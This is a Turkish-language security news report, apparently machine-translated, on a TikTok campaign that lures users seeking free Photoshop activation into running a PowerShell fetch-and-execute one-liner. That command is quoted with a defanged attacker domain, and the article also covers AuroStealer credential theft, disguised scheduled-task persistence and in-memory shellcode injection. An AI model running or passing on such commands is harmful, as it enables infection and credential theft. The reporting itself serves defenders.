Siber suçlular, ücretsiz yazılım aktivasyonu vaat eden ancak bunun yerine tehlikeli yükler sunan karmaşık kötü amaçlı yazılım kampanyalarını dağıtmak için TikTok’un devasa kullanıcı tabanından yararlanıyor.
Saldırı, şüphelenmeyen kullanıcıların sistemlerinde kötü amaçlı PowerShell komutlarını çalıştırmaları için kandırıldığı ClickFix tekniğini anımsatan sosyal mühendislik taktiklerinden yararlanıyor.
Mağdurlar, Photoshop gibi popüler yazılımların ücretsiz etkinleştirilmesini sunan TikTok videolarıyla karşılaşıyor ve böyle bir video tespit edilmeden önce 500’den fazla beğeni topluyor.
Saldırı zinciri, kullanıcıların PowerShell’i yönetici ayrıcalıklarıyla açma talimatlarını izlemesi ve yanıltıcı derecede basit bir tek satırlık komutu yürütmesiyle başlar.
İlk enfeksiyon vektörü kurbanlara komutu çalıştırmaları talimatını veriyor iex (irm slmgr[.]win/photoshop)Uzak bir sunucudan kötü amaçlı PowerShell kodunu alıp çalıştıran.
Bu birinci aşama veri (SHA256: 6D897B5661AA438A96AC8695C54B7C4F3A1FBF1B628C8D2011E50864860C6B23), 17/63 VirusTotal tespit oranına ulaşarak kaçınma yeteneklerini ortaya koydu.
Betik, hxxps://file-epq adresinden updater.exe adı verilen ikincil bir yürütülebilir dosyayı indirir.[.]sayfalar[.]Analiz, AuroStealer kötü amaçlı yazılımının hassas kimlik bilgilerini ve sistem bilgilerini toplamak için tasarlanmış dev/updater.exe olduğunu ortaya çıkardı.
.webp)
Internet Storm Center araştırmacıları kampanyayı tespit etti ve kalıcılık mekanizmalarının meşru sistem süreçleri olarak gizlenen zamanlanmış görevler aracılığıyla uygulandığını keşfetti.
Kötü amaçlı yazılım, orijinal Windows hizmetleriyle uyum sağlamak için “MicrosoftEdgeUpdateTaskMachineCore” gibi görev adlarını rastgele seçiyor ve her kullanıcı oturum açtığında yürütülmesini sağlıyor.
Source.exe (SHA256: db57e4a73d3cb90b53a0b1401cb47c41c1d6704a26983248897edcc13a367011) adlı üçüncü bir veri, şurada bulunan .NET Framework derleyicisini kullanarak çalışma zamanı sırasında isteğe bağlı C# kodunu derleyerek gelişmiş bir kaçınma tekniği sunar. C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe.
Kendi Kendini Derleme Tekniği ve Bellek Enjeksiyonu
Kendi kendini derleme yeteneği, geleneksel algılama mekanizmalarından kaçınmak için gelişmiş bir yaklaşımı temsil eder.
Kötü amaçlı yazılım, yürütme sırasında VirtualAlloc, CreateThread ve WaitForSingleObject gibi kernel32.dll işlevlerini içe aktaran bir C# sınıfı derler.
Dinamik olarak derlenen bu kod, yürütülebilir bellek alanı ayırır, kabuk kodunu doğrudan işlem belleğine enjekte eder ve diske ek dosyalar yazmadan kötü amaçlı yükü yürütmek için yeni bir iş parçacığı oluşturur.
Araştırmacılar, TikTok’ta çeşitli yazılım uygulamalarının kırık sürümlerini arayan kullanıcıları hedefleyen bu kampanyanın birden fazla varyasyonunu keşfetti ve yazılım indirmeleri için güvenilmeyen kaynaklardan kaçınmanın önemini vurguladı.
Daha Fazla Anında Güncelleme Almak için Bizi Google Haberler, LinkedIn ve X’te Takip Edin, CSN’yi Google’da Tercih Edilen Kaynak olarak ayarlayın.
